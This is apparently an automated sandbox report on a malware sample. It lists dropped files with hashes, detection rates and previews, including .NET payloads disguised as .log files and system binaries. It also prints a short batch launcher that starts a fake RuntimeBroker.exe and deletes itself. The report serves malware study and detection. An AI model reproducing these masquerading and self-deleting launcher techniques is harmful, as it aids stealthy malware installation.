                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljgrrvro.xpk.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4cypzbu.lpo.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbvfv4pb.q1o.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n32jgem2.12u.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohf5fmer.pus.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pt0zzkay.k1f.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rruiih4o.v3h.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxosvfb3.wd4.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_to31bhrt.fes.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whpv3dqb.t0f.ps1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjxanelm.vor.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpeq0wva.1wr.psm1

                                                                    Download File
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                    C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):204
                                                                    Entropy (8bit):5.273650810114031
                                                                    Encrypted:false
                                                                    SSDEEP:6:hCRLuVFOOr+DER5I3uhqhARvIKOZG1wkn23frz:CuVEOCDEfTVCfv
                                                                    MD5:9483DEA70E0EE86180F199F5136B8F16
                                                                    SHA1:6BFE1D36BFDD8396B7FC4D4C57AFED2CC0B557B4
                                                                    SHA-256:ACA2B4AD2A5510BD6A510A4C0EA3D089CCFD3A513983CF94850CC417C13A5E17
                                                                    SHA-512:85174ED45642766485AA990A5889326C1C6916DA5306DE7189F887FB5F0A95CCFEB90A15B86E8E75480FA4951EBDB2A5C8F4E8FFAEC160CC647714AAEAFA3BFB
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nQeR8AonhE.bat"

                                                                    C:\Users\user\Desktop\CnTGBqTF.log

                                                                    Download File
                                                                    Process:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\FpFoWZYA.log

                                                                    Download File
                                                                    Process:C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\ccbdacc87b6591

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):67
                                                                    Entropy (8bit):5.304603369433086
                                                                    Encrypted:false
                                                                    SSDEEP:3:zQnVwz6t5VDqNxRTj:fG5w1j
                                                                    MD5:E9A69E8C79D669B2689C59A278250500
                                                                    SHA1:2E909E95D561B31DBE828B23B61DB21B7B7BA11E
                                                                    SHA-256:3DAAE246A0142619CD1B0E721790F48D6D1EDE06018644AF63F5B578177FD105
                                                                    SHA-512:2FE5972DDDD0CD16FA2D67BD736A58A57FA3AA649D4E39B715DFD836608C28ECE3E67A2272905F93592A10ECD4C7CBA47281E2577436E9D560CF6A04668B2474
                                                                    Malicious:false
                                                                    Preview:UcuJbfm0m4pHjw8jdeknWjW3ZVHQzk0Hk7QLPJAVlmCtXsFT7ekMpBrvG1uFXVACDhg

                                                                    C:\Users\user\Desktop\nmJRokpY.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):23552
                                                                    Entropy (8bit):5.519109060441589
                                                                    Encrypted:false
                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Users\user\Desktop\vTqzCdqK.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):32256
                                                                    Entropy (8bit):5.631194486392901
                                                                    Encrypted:false
                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 24%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                    C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                    C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Windows\SysWOW64\en-GB\Licenses\_Default\a4716c5db9108b

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with very long lines (453), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):453
                                                                    Entropy (8bit):5.851386074137753
                                                                    Encrypted:false
                                                                    SSDEEP:12:QEFRYd/19BeCwygOcHcQP4D5pcoQCiD0ODtlio45:QU6/8CW/HcPDQof2jC5
                                                                    MD5:73CC5F799337E791917A83C2A078BCE1
                                                                    SHA1:4A08BC220007D7B0BF104691D14C16CC302D98B2
                                                                    SHA-256:77E21860B1854731CDEFF346F96E5A2F7DA4899BC7E1216F558C02DE62B717B5
                                                                    SHA-512:9867CB2B34DA14A3A91AE2FA239CB24D58E039ECBDF073D936A632706A2ECC7F881E56D63A51B959A29F9B7503E8F146A4462E700838E2F8B70329D1DB77900B
                                                                    Malicious:false
                                                                    Preview:YSOvuaGr5vYtzBQezqT417OcEwNUD6U942ycgbAsgRL8wEYjsSDgMDkaDvr8Mvn8bYz6Ny7XqlYjwPqAXomv3xx0SXYvtBfvnMhYOcV4Up0koAoxFrkhI2Fnl8n0aLooFn5jsRv5TsbN7MLRskqCb8mvH4xQyfeIBLeBEEFx5pOaa1qYwWHzflNHBKcyeeGxNSMvsKMne2HvtLUPNYecXoma8XA4mRSbibMIp5qmJdVmdbXzzMkFAoZjpvwUJRBMkqNS9MjRs2S4T96hALFZqMa3Bnc4IVc2cICxNEzmnSXIWfQpzPU8MlfXPURWupJXaabK7IT5VcwYzSgfWwE3Bdp1mpi3xd28J9s6EFsq6YntzHh7yv97kQV6ujhSkaI1jyOzjjbRDY6nz5CfHlEBe5X3ovMehaGfQwKA2rXOUr3MTsGyhCK9VGWoaVLyX6tnRbWDv

                                                                    C:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):1224
                                                                    Entropy (8bit):4.435108676655666
                                                                    Encrypted:false
                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                    Malicious:false
                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                    C:\Windows\System32\SecurityHealthSystray.exe

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4608
                                                                    Entropy (8bit):3.9574413302532645
                                                                    Encrypted:false
                                                                    SSDEEP:48:6vJzPt5M7Jt8Bs3FJsdcV4MKe27QPvqBHWOulajfqXSfbNtm:iPYPc+Vx9MQPvkwcjRzNt
                                                                    MD5:910F48243DDBA79AE6524E0A40DDAAF7
                                                                    SHA1:F3286746415C2081817AFCD413670D4F4D807765
                                                                    SHA-256:3F544AB1D24106D41E9612091C6B0C20DBAA296DCD77C74AB336B590CD6E825F
                                                                    SHA-512:2FB23F9CA14F84C318EF480CEE1FF9D32ADB3166DA513428674B8F826E4E64FC81008936CD63D14B01B263B32BE7715CDC72810C2181ADC640118A631DE57D52
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....*g.............................'... ...@....@.. ....................................@.................................T'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..,.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                    \Device\Null

                                                                    Download File
                                                                    Process:C:\Windows\System32\PING.EXE
